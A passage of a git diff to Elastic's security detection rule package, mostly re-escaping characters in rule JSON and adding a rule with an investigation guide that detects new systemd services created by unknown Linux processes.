Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json index ec8e549ac57..dddf7ae26d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1781d055-5c66-4adf-9e93-fc0fa69550c9_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json index 69697e43085..320425b9376 100644 --- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json index 645e9fe62fc..061e9ca7af0 100644 --- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json index dd78380b639..96ebeb359ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json index 8d477d4b6f1..c4de4e61d09 100644 --- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json index d7865ad1036..fc647a42349 100644 --- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_5.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json index d01242a39af..c727206bb58 100644 --- a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_6.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_7.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_7.json new file mode 100644 index 00000000000..81e79945e2e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_7.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New Systemd Service Created by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating New Systemd Service Created by Previously Unknown Process\n\nSystemd service files are configuration files in Linux systems used to define and manage system services.\n\nMalicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the creation of new systemd service files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the systemd service file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd services through the following command `sudo systemctl list-unit-files`.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd services for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:file and event.action:(\"creation\" or \"file_create_event\") and file.path:(\n /etc/systemd/system/* or \n /usr/local/lib/systemd/system/* or \n /lib/systemd/system/* or \n /usr/lib/systemd/system/* or \n /home/*/.config/systemd/user/*\n) and \nnot (\n process.name:(\n \"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"dnf-automatic\" or python* or \"puppetd\" or\n \"elastic-agent\" or \"cinc-client\" or \"chef-client\" or \"pacman\" or \"puppet\" or \"cloudflared\"\n ) or \n file.extension:(\"swp\" or \"swpx\")\n)\n", + "references": [ + "https://opensource.com/article/20/7/systemd-timers", + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17b0a495-4d9f-414c-8ad0-92f018b8e001", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 7 + }, + "id": "17b0a495-4d9f-414c-8ad0-92f018b8e001_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json index cbeb9507623..6b7e1e5f88e 100644 --- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_104.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Suspicious Execution - Short Program Name", "note": "", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", "related_integrations": [ { "package": "endpoint", @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json index 5da230f1d13..6ba4b5597b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_105.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Suspicious Execution - Short Program Name", "note": "", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", "related_integrations": [ { "package": "endpoint", @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json index 6f420254849..227d29c2409 100644 --- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_106.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed Utility Executed with Short Program Name", - "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) \u003e 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) \u003e 5\n", + "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", "related_integrations": [ { "package": "endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json index 128b7f103b8..b6ba7fd8be5 100644 --- a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_107.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed Utility Executed with Short Program Name", - "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 